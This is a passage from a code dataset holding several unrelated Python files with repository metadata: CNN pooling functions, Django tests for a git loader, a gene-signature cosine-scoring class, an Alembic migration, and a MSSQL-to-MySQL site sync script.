self.biases[fm_idx]\n self.down_in[fm_idx] = max_pool(inputs[fm_idx], self.size)\n # self.output[fm_idx] = self.activation_func(weight * self.down_in[fm_idx] + bias)\n self.output[fm_idx] = self.down_in[fm_idx]\n out = self.output\n # when there is only a single pixel as output, return a vector\n if fm_out_shape == (1, 1):\n out = np.array([out[:, 0, 0]])\n return out\n\n def backpropagate(self, error):\n self.deltas = np.zeros(self.output.shape)\n error_shape = np.shape(error)\n backprop_error = np.zeros((error_shape[0], self.in_shape[1], self.in_shape[2]))\n for fm_idx in range(self.num_maps):\n fm_error = error[fm_idx]\n # fm_weight = self.weights[fm_idx]\n # deriv_input = self.deriv_activation_func(self.output[fm_idx])\n # self.deltas[fm_idx] = deriv_input * fm_error\n backprop_error[fm_idx] = tile(fm_error, self.size)#trans.resize(fm_weight * self.deltas[fm_idx], (self.in_shape[1], self.in_shape[2]))\n return backprop_error\n\n def calc_gradients(self):\n self.gradients = np.zeros(self.weights.shape)\n for fm_idx in range(self.num_maps):\n fm_delta = self.deltas[fm_idx]\n fm_gradient = np.sum(self.down_in[fm_idx] * fm_delta)\n self.gradients[fm_idx] = fm_gradient\n\n def update(self, learning_rate):\n return\n for fm_idx in range(self.num_maps):\n self.biases[fm_idx] -= learning_rate * np.sum(self.deltas[fm_idx]) #* np.power(self.kernel_size, 2) * self.num_prev_maps\n fm_gradient = self.gradients[fm_idx]\n self.weights[fm_idx] -= learning_rate * fm_gradient\n\n\ndef max_pool(img, size):\n \"\"\"\n Applies max-pooling to the given 2D numpy array using non-overlapping\n squares of size * size pixels. Resulting in a 2D numpy array that is\n scaled by 1/size.\n :param img: Input 2D numpy array that is max-pooled\n :param size: Size of the square used for max-pooling\n :return: Max-pooled 2D numpy array scaled by 1/size\n \"\"\"\n img_shape = np.shape(img)\n # pad vertically with -1\n if img_shape[0] % size != 0:\n img = np.vstack((img, np.ones((size - img_shape[0] % size, img_shape[1])) * -1))\n img_shape = np.shape(img)\n # pad horizontally with -1\n if img_shape[1] % size != 0:\n img = np.hstack((img, np.ones((img_shape[0], size - img_shape[1] % size)) * -1))\n img_shape = np.shape(img)\n result = np.zeros((img_shape[0] / size, img_shape[1] / size))\n for row in range(0, img_shape[0]-size+1, size):\n for col in range(0, img_shape[1]-size+1, size):\n result[row/size, col/size] = np.max(img[row:row + size, col:col + size])\n return result\n\ndef avg_pool(img, size):\n img_shape = np.shape(img)\n # pad vertically with -1\n # if img_shape[0] % size != 0:\n # img = np.vstack((img, np.ones((size - img_shape[0] % size, img_shape[1])) * -1))\n # img_shape = np.shape(img)\n # # pad horizontally with -1\n # if img_shape[1] % size != 0:\n # img = np.hstack((img, np.ones((img_shape[0], size - img_shape[1] % size)) * -1))\n # img_shape = np.shape(img)\n result = np.zeros((img_shape[0] / size, img_shape[1] / size))\n for row in range(0, img_shape[0]-size+1, size):\n for col in range(0, img_shape[1]-size+1, size):\n result[row/size, col/size] = np.average(img[row:row + size, col:col + size])\n return result\n\ndef tile(img, size):\n \"\"\"\n Tiles each pixel in the given image 'size' times. This is meant to be used\n as inverse operation to max-pooling.\n :param img: 2D numpy array\n :param size: number how often each pixel is tiled in each dimension\n :return: 2D numpy array whose size is increased 'size' times in each\n dimension\n \"\"\"\n img_shape = np.shape(img)\n result = np.zeros((img_shape[0] * size, img_shape[1] * size))\n for row in range(img_shape[0]):\n for col in range(img_shape[1]):\n result[row * size:(row + 1) * size, col * size:(col + 1) * size] = img[row, col]\n return result", "repo_name": "xapharius/mrEnsemble", "sub_path": "Engine/src/algorithms/neuralnetwork/convolutional/layers.py", "file_name": "layers.py", "file_ext": "py", "file_size_in_byte": 13450, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.tanh", "line_number": 20, "usage_type": "attribute"}, {"api_name": "utils.numpyutils.tanh_deriv", "line_number": 20, "usage_type": "attribute"}, {"api_name": "utils.numpyutils", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 46, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.copy", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 72, "usage_type": "call"}, {"api_name": "scipy.signal.signaltools.convolve2d", "line_number": 77, "usage_type": "call"}, {"api_name": "scipy.signal.signaltools", "line_number": 77, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 96, "usage_type": "call"}, {"api_name": "scipy.signal.signaltools.correlate2d", "line_number": 120, "usage_type": "call"}, {"api_name": "scipy.signal.signaltools", "line_number": 120, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 128, "usage_type": "call"}, {"api_name": "utils.numpyutils.rot180", "line_number": 137, "usage_type": "call"}, {"api_name": "utils.numpyutils", "line_number": 137, "usage_type": "name"}, {"api_name": "scipy.signal.signaltools.correlate2d", "line_number": 137, "usage_type": "call"}, {"api_name": "scipy.signal.signaltools", "line_number": 137, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.tanh", "line_number": 157, "usage_type": "attribute"}, {"api_name": "utils.numpyutils.tanh_deriv", "line_number": 157, "usage_type": "attribute"}, {"api_name": "utils.numpyutils", "line_number": 157, "usage_type": "name"}, {"api_name": "numpy.random.random", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 166, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 185, "usage_type": "call"}, {"api_name": "numpy.ceil", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 187, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 198, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 203, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 217, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 223, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 240, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 241, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 246, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 253, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.average", "line_number": 265, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 277, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 278, "usage_type": "call"}]} +{"seq_id": "69804020994", "text": "# -*- coding: utf-8 -*-\n# Python 3.6\n#\n# Author: Coumes Quentin Mail: qcoumes@etud.u-pem.fr\n# Created: 2017-03-16\n# Last Modified: 2017-03-16\n\nimport os, shutil\n\nfrom django.test import TestCase\nfrom django.shortcuts import get_object_or_404\n\nfrom gitload.base import Repository, PLTP_Loader\nfrom gitload.models import Loaded_Pltp, Loaded_Pl\n\nfrom serverpl.settings import MEDIA_ROOT\n\n\n\n\nclass TestGetRepository(TestCase):\n \n def test_get_repo_pulled(self):\n \"\"\" Check if repository has been correctly clone when get_repo() return True. Need an internet connection. \"\"\"\n repo = Repository(\"https://github.com/qcoumes/gitload_test.git\")\n self.assertTrue(repo.get_repo())\n self.assertTrue(os.path.exists(MEDIA_ROOT+\"/gitload_test\"))\n if (os.path.exists(MEDIA_ROOT+\"/gitload_test\")):\n shutil.rmtree(MEDIA_ROOT+\"/gitload_test\")\n \n def test_get_repo_false(self):\n \"\"\" Check if get_repo() correctly return False when the URL is wrong. Need an internet connection. \"\"\"\n repo = Repository(\"https://repo.com/fake.git\")\n self.assertFalse(repo.get_repo())\n if (os.path.exists(MEDIA_ROOT+\"/fake\")):\n shutil.rmtree(MEDIA_ROOT+\"/fake\")\n\n\n\nclass TestRepository(TestCase):\n \n @classmethod\n def setUpClass(self):\n \"\"\" Set a repo for the following test \"\"\"\n self.repo = Repository(\"https://github.com/qcoumes/gitload_test.git\")\n self.repo.get_repo()\n \n @classmethod\n def tearDownClass(self):\n \"\"\" Delete de test repo at the end of the tests \"\"\"\n if (os.path.exists(MEDIA_ROOT+\"/gitload_test\")):\n shutil.rmtree(MEDIA_ROOT+\"/gitload_test\")\n \n def setUp(self):\n \"\"\" Set the cursor to the repo root before very test \"\"\"\n self.repo.cd()\n \n \n def test_cd(self):\n \"\"\" Check if cd() correctly change Repository.local_current_path. Need an internet connection. \"\"\"\n self.repo.cd(\"PLTP\")\n self.assertEqual(self.repo.local_current_path, self.repo.local_root + \"/PLTP/\")\n self.repo.cd()\n self.assertEqual(self.repo.local_current_path, self.repo.local_root)\n \n def test_parse_content(self):\n \"\"\" Check if parse_content() correctly lists every files. Need an internet connection. \"\"\"\n self.repo.cd(\"PLTP\")\n self.repo.parse_content()\n self.assertEqual(self.repo.local_pltp_list, [\"test.pltp\"])\n self.assertEqual(self.repo.local_other_list, [\"autosubsets.pl\"])\n self.assertEqual(self.repo.local_dir_list, [\"function\"])\n \n def test_load_pltp(self):\n \"\"\" Check if load_pltp() correctly create an instance of PLTP_Loader \"\"\"\n self.assertIsInstance(self.repo.load_pltp(\"/PLTP/test.pltp\"), PLTP_Loader)\n\nclass TestPLTPLoader(TestCase):\n \n @classmethod\n def setUpClass(self):\n \"\"\" Set a repo for the following test \"\"\"\n self.repo = Repository(\"https://github.com/qcoumes/gitload_test.git\")\n self.repo.get_repo()\n self.loader = self.repo.load_pltp(\"/PLTP/test.pltp\")\n \n @classmethod\n def tearDownClass(self):\n if (os.path.exists(MEDIA_ROOT+\"/pl_test1_\"+self.loader.version)):\n shutil.rmtree(MEDIA_ROOT+\"/pl_test1_\"+self.loader.version)\n if (os.path.exists(MEDIA_ROOT+\"/pl_test2_\"+self.loader.version)):\n shutil.rmtree(MEDIA_ROOT+\"/pl_test2_\"+self.loader.version)\n \n def test_load_file(self):\n \"\"\" Check if every file are correctly loaded \"\"\"\n self.assertTrue(os.path.exists(MEDIA_ROOT+\"/pl_test1_\"+self.loader.version))\n self.assertTrue(os.path.exists(MEDIA_ROOT+\"/pl_test2_\"+self.loader.version))\n \n def test_load_data_base(self):\n \"\"\" Check if every information are present in the data base after loading \"\"\"\n pltp = get_object_or_404(Loaded_Pltp, name=\"test\")\n pl = pltp.loaded_pl_set.all()\n \n self.assertEqual(pltp.name, \"test\")\n #test json\n \n self.assertEqual(len(pl), 2)\n \n self.assertEqual(pl[0].name, \"test1\")\n #test dirname + json\n self.assertEqual(pl[1].name, \"test2\")\n #test dirname + json\n \n \n \n", "repo_name": "plgitlogin/server-pl", "sub_path": "gitload/test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 4201, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.test.TestCase", "line_number": 21, "usage_type": "name"}, {"api_name": "gitload.base.Repository", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 27, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 28, "usage_type": "call"}, {"api_name": "os.path", "line_number": 28, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 28, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 29, "usage_type": "call"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 29, "usage_type": "name"}, {"api_name": "gitload.base.Repository", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path", "line_number": 35, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 35, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 36, "usage_type": "call"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 36, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 40, "usage_type": "name"}, {"api_name": "gitload.base.Repository", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 51, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 52, "usage_type": "call"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 52, "usage_type": "name"}, {"api_name": "gitload.base.PLTP_Loader", "line_number": 76, "usage_type": "argument"}, {"api_name": "django.test.TestCase", "line_number": 78, "usage_type": "name"}, {"api_name": "gitload.base.Repository", "line_number": 83, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 89, "usage_type": "call"}, {"api_name": "os.path", "line_number": 89, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 89, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 90, "usage_type": "call"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 90, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 91, "usage_type": "call"}, {"api_name": "os.path", "line_number": 91, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 91, "usage_type": "name"}, {"api_name": "shutil.rmtree", "line_number": 92, "usage_type": "call"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 92, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 96, "usage_type": "call"}, {"api_name": "os.path", "line_number": 96, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 96, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 97, "usage_type": "call"}, {"api_name": "os.path", "line_number": 97, "usage_type": "attribute"}, {"api_name": "serverpl.settings.MEDIA_ROOT", "line_number": 97, "usage_type": "name"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 101, "usage_type": "call"}, {"api_name": "gitload.models.Loaded_Pltp", "line_number": 101, "usage_type": "argument"}]} +{"seq_id": "26532682030", "text": "import time\nfrom collections import *\nfrom joblib import Parallel, delayed\nfrom scipy.spatial import distance\n\nfrom BD_signature_parser import *\nfrom metric_calculator import *\n#from cmap import decomposition\nimport numpy as np\n#from gtf_parser import *\nfrom signature_extractor import *\nfrom new_signature_extractor import *\n\n\ndef decomposition(data):\n vector = []\n for j in range(len(data)):\n out_vector_1 = []\n out_vector_2 = []\n for gene, val in data[j].items():\n if len(val) == 2:\n out_vector_1.append(1.0)\n out_vector_2.append(1.0)\n if len(val) == 1 and val[0] == 0:\n out_vector_1.append(1.0)\n out_vector_2.append(0.0)\n if len(val) == 1 and val[0] == 1:\n out_vector_1.append(0.0)\n out_vector_2.append(1.0)\n\n vector.append(out_vector_1)\n vector.append(out_vector_2)\n return vector\n\ndef inf_score_expression(matrix, weights):\n \"\"\"\n vector = (np.array(list(matrix.loc[1])) * weights[0] + 1) * (\n np.array(list(matrix.loc[2])) * weights[1] + 1) * (\n np.array(list(matrix.loc[3])) * weights[2] + 1) * (\n np.array(list(matrix.loc[4])) * weights[3] + 1) * (\n np.array(list(matrix.loc[5])) * weights[4] + 1) * (\n np.array(list(matrix.loc[6])) * weights[5] + 1) * (\n np.array(list(matrix.loc[7])) * weights[6] + 1) * (\n np.array(list(matrix.loc[8])) * weights[7] + 1) + weights[8]\n \"\"\"\n vector = (np.array(list(matrix.loc[1])) * weights[1] + 1) * (\n np.array(list(matrix.loc[2])) * weights[2] + 1) * (\n np.array(list(matrix.loc[3])) * weights[3] + 1) * (\n np.array(list(matrix.loc[4])) * weights[4] + 1) * (\n np.array(list(matrix.loc[5])) * weights[5] + 1) * (\n np.array(list(matrix.loc[6])) * weights[6] + 1) * (\n np.array(list(matrix.loc[7])) * weights[7] + 1) + weights[8]\n\n return vector\n\n\nclass TopoCMap:\n\n def __init__(self, db, mode, file):\n self.up_request, self.down_request, self.up_FC, self.down_FC = new_signature_extractor(file[0], file[1])\n self.db = db\n self.mode = mode\n self.metrics_up = centrality_metrics(0.1, self.up_request, self.up_FC).metric_calculator()\n self.metrics_down = centrality_metrics(0.1, self.down_request, self.down_FC).metric_calculator()\n self.inf_score_up = None\n self.inf_score_down = None\n\n def space_finding(self, db_up, db_down):\n\n #if self.mode == \"reverse\":\n\n #set_1 = list(set(self.down_request + db_up))\n #set_2 = list(set(self.up_request + db_down))\n ## проверять что set1 не пересекается с set2\n #else:\n #set_1 = list(set(self.down_request + db_down))\n #set_2 = list(set(self.up_request + db_up))\n set_1 = list(self.down_request)\n set_2 = list(self.up_request)\n set_1.extend(list(set(db_up).difference(set(self.down_request))))\n set_2.extend(list(set(db_down).difference(set(self.up_request))))\n dict_1 = defaultdict(list)\n dict_2 = defaultdict(list)\n for gene in self.down_request:\n dict_1[gene].append(0)\n\n for gene in self.up_request:\n dict_2[gene].append(0)\n\n for gene in db_up:\n dict_1[gene].append(1)\n\n for gene in db_down:\n dict_2[gene].append(1)\n ord_dict_1 = {key: dict_1[key] for key in set_1}\n ord_dict_2 = {key: dict_2[key] for key in set_2}\n return ord_dict_1, ord_dict_2\n\n def influence_score(self, weights):\n inf_scores_up = []\n inf_scores_down = []\n inf_scores_up.append(self.metrics_up.loc[0])\n \"\"\"\n for i in range(1, 7):\n print(np.std(list(self.metrics_up.loc[i])))\n \"\"\"\n inf_scores_up.append(list(inf_score_expression(self.metrics_up, weights)))\n inf_scores_down.append(self.metrics_down.loc[0])\n inf_scores_down.append(list(inf_score_expression(self.metrics_down, weights)))\n self.inf_score_up = inf_scores_up\n self.inf_score_down = inf_scores_down\n\n @staticmethod\n def current_scores(space, inf_score):\n inf_score[0] = list(inf_score[0])\n output = inf_score[1].copy()\n output.extend(np.ones(len(space) - len(inf_score[0])))\n return output\n\n def cmap(self, db_up, db_down):\n\n set_1, set_2 = self.space_finding(db_up, db_down)\n #data = [(self.up_request, set_2), (db_down, set_2), (self.down_request, set_1), (db_up, set_1)]\n #data = [(self.up_request, space), (db_down, space), (self.down_request, space), (db_up, space)]\n spaces = [set_2, set_1]\n results = decomposition(spaces)\n scores = []\n data = [self.inf_score_up, self.inf_score_down]\n for ind in range(len(spaces)):\n scores.append(self.current_scores(spaces[ind], data[ind]))\n cos1 = distance.cosine(results[2], results[3], np.nan_to_num(scores[1], nan=1.0))\n cos2 = distance.cosine(results[0], results[1], np.nan_to_num(scores[0], nan=1.0))\n cosine_dist = 0.5 * (cos1 + cos2)\n\n return cosine_dist\n\n def small_molec(self, sig_names, file_meta, file_drug, weights):\n self.influence_score(weights)\n cos_dist = []\n start = time.time()\n #space = gtf_parser()\n #scores = self.current_scores(space)\n for i in tqdm.tqdm(range(0, len(self.db), 2)):\n cos_dist.append(self.cmap(self.db[i], self.db[i+1]))\n end = time.time()\n print(end - start)\n output_data = pd.DataFrame([sig_names, cos_dist])\n metadata = pd.read_csv(file_meta)\n drugs = pd.read_csv(file_drug)\n pert_ids = []\n for sig in output_data.loc[0]:\n for ind, pert in enumerate(metadata['sig_id']):\n if sig == pert:\n pert_ids.append(metadata[\"pert_id\"].loc[ind])\n output_data = output_data.append(pd.Series(pert_ids), ignore_index=True)\n chems = []\n for pert in pert_ids:\n for ind, chem in enumerate(drugs['pert_id']):\n if pert == chem:\n chems.append(drugs['pubchem_cid'].loc[ind])\n output_data = output_data.append(pd.Series(chems), ignore_index=True)\n chem_name = []\n for pert in pert_ids:\n for ind, chem in enumerate(drugs['pert_id']):\n if pert == chem:\n chem_name.append(drugs['pert_iname'].loc[ind])\n output_data = output_data.append(pd.Series(chem_name), ignore_index=True)\n return output_data\n\n## отнормировать коэффициенты и посмотреть распределения коэффициентов для метрик\n## баесовская оптимизация\n\n", "repo_name": "marie-minaeva/Topo_CM", "sub_path": "Topo_CMap_project/Cmap.py", "file_name": "Cmap.py", "file_ext": "py", "file_size_in_byte": 7033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 117, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 131, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 131, "usage_type": "name"}, {"api_name": "numpy.nan_to_num", "line_number": 131, "usage_type": "call"}, {"api_name": "scipy.spatial.distance.cosine", "line_number": 132, "usage_type": "call"}, {"api_name": "scipy.spatial.distance", "line_number": 132, "usage_type": "name"}, {"api_name": "numpy.nan_to_num", "line_number": 132, "usage_type": "call"}, {"api_name": "time.time", "line_number": 140, "usage_type": "call"}, {"api_name": "time.time", "line_number": 145, "usage_type": "call"}]} +{"seq_id": "30550038314", "text": "\"\"\"create hash images\n\nRevision ID: 5d519b033846\nRevises: 697ad27726a8\nCreate Date: 2019-08-23 15:29:55.639581\n\n\"\"\"\nimport sqlalchemy as sa\nfrom sqlalchemy.sql import func\n\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = '5d519b033846'\ndown_revision = '697ad27726a8'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n op.create_table(\n 'hash_images', sa.Column('id', sa.String(25), primary_key=True),\n sa.Column('digital_content_id', sa.String(25), nullable=False),\n sa.Column('hash_type', sa.String(10), nullable=False),\n sa.Column('created_at',\n sa.DateTime(timezone=True),\n nullable=False,\n server_default=func.now()),\n sa.Column('updated_at',\n sa.DateTime(timezone=True),\n nullable=False,\n server_default=func.now()),\n sa.Index(\"digital_content_id_index\", \"digital_content_id\"))\n\n\ndef downgrade():\n op.drop_table('hash_images')\n", "repo_name": "thesixnetwork/sixecho-server", "sub_path": "db/migration/versions/5d519b033846_create_hash_images.py", "file_name": "5d519b033846_create_hash_images.py", "file_ext": "py", "file_size_in_byte": 1016, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "alembic.op.create_table", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 22, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 23, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.String", "line_number": 24, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 25, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 26, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.func.now", "line_number": 28, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.func", "line_number": 28, "usage_type": "name"}, {"api_name": "sqlalchemy.Column", "line_number": 29, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 30, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.func.now", "line_number": 32, "usage_type": "call"}, {"api_name": "sqlalchemy.sql.func", "line_number": 32, "usage_type": "name"}, {"api_name": "sqlalchemy.Index", "line_number": 33, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 37, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "9381984599", "text": "# -*- coding: utf-8 -*-\n\nimport json, time, datetime\n#from datetime import date, time, timedelta\nfrom datetime import date, timedelta\nimport pytz\n\nimport mysql.connector\n#from mysql.connector import connection\nfrom mysql.connector import errorcode\nfrom database.mysql import Mysql\nfrom database.mssql import Mssql\n\n# ao2o DB 정보 (실제 정보로 변경할 것)\nconfig_ao2o = {\n 'host': '127.0.0.1',\n 'port': '3306',\n 'user': 'user',\n 'password': 'pass',\n 'database': 'ao2o',\n 'raise_on_warnings': True,\n}\n\n# fc_master DB 정보 (실제 정보로 변경할 것)\nconfig_fc_master = {\n 'server': '127.0.0.1',\n 'port': '1433',\n 'user': 'user',\n 'password': 'pass',\n 'database': 'fc_master',\n 'charset': 'utf8',\n 'as_dict': True\n}\n\n# 현장정보 동기화 모듈\nclass SiteSync:\n def __init__(self):\n print('** 현장정보 동기화 초기화 **')\n pass\n\n def run(self):\n print('** 현장정보 동기화 실행 **')\n pass\n\n # 1. 기존 현장을 disable 시킨다.\n # 2. 동기화 시간 설정\n # 3. fc_master.areadef 의 현장 목록을 가져 온다.\n # 4. ao2o.areadef 에 등록한다.\n\n cnx_mysql = Mysql(config_ao2o)\n cnx_mssql = Mssql(config_fc_master)\n\n # 기존 현장을 disable 시킨다.\n query = \"UPDATE areadef SET enabled = 0\"\n cnx_mysql.execute(query)\n\n # 동기화 시간 확인 (utc 시간으로 변환한다.)\n sync_utc_time = datetime.datetime.now().astimezone(pytz.utc).strftime('%Y-%m-%d %H:%M:%S')\n sync_time = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')\n print(\"sync_time = \", sync_time)\n\n # 검색식 생성\n query = \"SELECT * FROM areadef \"\n print('query = ' + query)\n\n rows = cnx_mssql.query(query)\n cnt = 0\n for row in rows:\n cnt += 1\n if row['acLotAreaName1'] == None:\n row['acLotAreaName1'] = ''\n if row['acLotAreaName2'] == None:\n row['acLotAreaName2'] = ''\n if row['acLotAreaInfo'] == None:\n row['acLotAreaInfo'] = ''\n if row['acCompanyPlace'] == None:\n row['acCompanyPlace'] = ''\n if row['acCompanyAddress'] == None:\n row['acCompanyAddress'] = ''\n if row['acZipCode1'] == None:\n row['acZipCode1'] = ''\n if row['acZipCode2'] == None:\n row['acZipCode2'] = ''\n if row['acTelNo'] == None:\n row['acTelNo'] = ''\n\n if row['acLotAreaName1'] == '' and row['acLotAreaName2'] != '':\n row['acLotAreaName1'] = row['acLotAreaName2']\n\n # logger.info(row[0])\n # print(\"row = \", row)\n\n query = \"SELECT * FROM areadef WHERE id = {} AND iLotArea = {}\".format(row['id'], row['iLotArea'])\n print(\"query = \", query)\n areas = cnx_mysql.query(query)\n if len(areas) == 0:\n print(\"신규 현장 정보\")\n query = \"\"\n query += \"INSERT INTO areadef (\"\n query += \" id\"\n query += \", iLotArea\"\n query += \", acLotAreaName1\"\n query += \", acLotAreaName2\"\n query += \", acLotAreaInfo\"\n query += \", acCompanyPlace\"\n query += \", acZipCode1\"\n query += \", acZipCode2\"\n query += \", acTelNo\"\n query += \", last_sync_time\"\n query += \", update_count\"\n query += \", enabled\"\n query += \") VALUES (\"\n query += \"{}\".format(row['id'])\n query += \", {}\".format(row['iLotArea'])\n query += \", '{}'\".format(row['acLotAreaName1'])\n query += \", '{}'\".format(row['acLotAreaName2'])\n query += \", '{}'\".format(row['acLotAreaInfo'])\n query += \", '{}'\".format(row['acCompanyPlace'])\n query += \", '{}'\".format(row['acZipCode1'])\n query += \", '{}'\".format(row['acZipCode2'])\n query += \", '{}'\".format(row['acTelNo'])\n query += \", '{}'\".format(sync_utc_time)\n query += \", {}\".format(1)\n query += \", {}\".format(1)\n query += \")\"\n else:\n print(\"이미 등록된 현장 정보\")\n query = \"\"\n query += \"UPDATE areadef SET\"\n query += \" acLotAreaName1 = '{}'\".format(row['acLotAreaName1'])\n query += \", acLotAreaName2 = '{}'\".format(row['acLotAreaName2'])\n query += \", acLotAreaInfo = '{}'\".format(row['acLotAreaInfo'])\n query += \", acCompanyPlace = '{}'\".format(row['acCompanyPlace'])\n query += \", acZipCode1 = '{}'\".format(row['acZipCode1'])\n query += \", acZipCode2 = '{}'\".format(row['acZipCode2'])\n query += \", acTelNo = '{}'\".format(row['acTelNo'])\n query += \", last_sync_time = '{}'\".format(sync_utc_time)\n query += \", update_count = update_count + 1\"\n query += \", enabled = 1\"\n query += \" WHERE \"\n query += \" id = {} AND iLotArea = {}\".format(row['id'], row['iLotArea'])\n print(\"query[{}] = {}\".format(cnt, query))\n cnx_mysql.execute(query)\n\n cnx_mysql.disconnect()\n cnx_mssql.disconnect()\n\n\nif __name__ == \"__main__\":\n\n exit()\n\n try:\n cnx = 